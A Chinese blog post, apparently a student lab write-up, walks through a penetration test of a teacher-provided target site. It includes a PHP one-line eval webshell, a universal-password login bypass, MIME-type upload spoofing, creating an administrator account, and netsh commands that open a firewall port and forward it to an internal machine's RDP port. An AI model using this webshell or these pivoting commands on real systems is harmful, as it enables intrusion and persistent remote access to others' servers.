zoukankan      html  css  js  c++  java
  • 一次简单的渗透

    一次实验作业,老师给的靶场网站。

    进入网站,注册,登录,因为老师给了文件上传提示,所以直奔上传头像处

    上传小马,提示图片不存在

    将小马后缀改成.jpg,上传抓包

    tx的内容应该是将符号用url编码,其他内容用base64编码

    tx解码后内容:data:image/jpeg;base64,<?php @eval($_POST['a']); />

    发现一句话木马的尾部被修改了,将包发送出去,提示:

    查阅资料,应该是会用GD函数将图片渲染,不知道如何绕过。 

    上传图片马验证,抓包

    包中没有地方能修改文件后缀或文件类型

    御剑扫后台,扫出5个没用的目录

    自己随便输了/admin,进入后台登录界面

    分析该界面,注册、重置密码功能都是用前端JS写的,没有与后台数据库产生交互,只有登录功能有用

    尝试万能密码登录成功

    登录后是一个上传点,为服务端MIME 类型检测

    上传小马,更改文件类型

    上传成功

    蚁剑连接,查看权限

    查看端口,3389端口开放

    创建用户并加入管理员组

    这台服务器处于内网

    使用下面两条命令把来自外部的 tcp 的6666端口流量全部转发到内网的2008r2机器的3389端口上

    netsh advfirewall firewall add rule name="winmgmt" dir=in action=allow protocol=TCP localport=6666
    netsh interface portproxy add v4tov4 listenport=6666 connectaddress=192.168.2.57 connectport=3389

     用自己创建的账号远程桌面登录

     

    https://www.cnblogs.com/paperpen/p/10972904.html

     

  • 相关阅读:
    bash while until 循环用法
    微信小程序入门介绍
    jquery遍历
    jquery获取元素和DOM获取元素
    ul在div中水平居中效果
    一个文字在一个图片上水平居中,并且悬浮变大特效
    一个div在另一个div中垂直居中的方法
    layer插件的使用
    百度分享插件使用
    图标字体
  • 原文地址:https://www.cnblogs.com/rnss/p/10973160.html
Copyright © 2011-2022 走看看